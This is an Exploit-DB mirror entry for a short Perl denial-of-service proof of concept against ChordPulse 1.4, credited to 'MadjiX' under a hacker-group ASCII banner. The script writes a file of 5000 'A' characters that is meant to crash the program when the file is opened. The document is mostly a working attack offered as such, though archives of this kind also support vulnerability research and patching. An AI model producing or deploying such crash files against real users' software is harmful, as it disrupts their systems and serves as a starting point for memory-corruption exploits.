exploit-db-mirror/exploits/windows/dos/14511.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

18 lines
No EOL
1.2 KiB
Perl
Executable file

# Vendor: http://www.chordpulse.com/
########################################################################################
# _ #
# .-----.--.--.--.----.----.-.---| | #
# | _ | | | | | -__| _ | #
# | __|________|__|__|_____|_____| #
# |__| By MadjiX #
# Sec4ever.com #
########################################################################################
#Title : ChordPulse <--- 1.4 Denial of Service Vulnerability #
#author : MadjiX <Dz8[]Hotmail{}com> #
#Gr33tz : His0k4 , Bibi-info , volc4n0 #
########################################################################################
my $file="madjix.cps";
my $dz="\x41" x 5000 ;
open(MYFILE,'>>MadjiX.cps');
print MYFILE $dz;
close(MYFILE);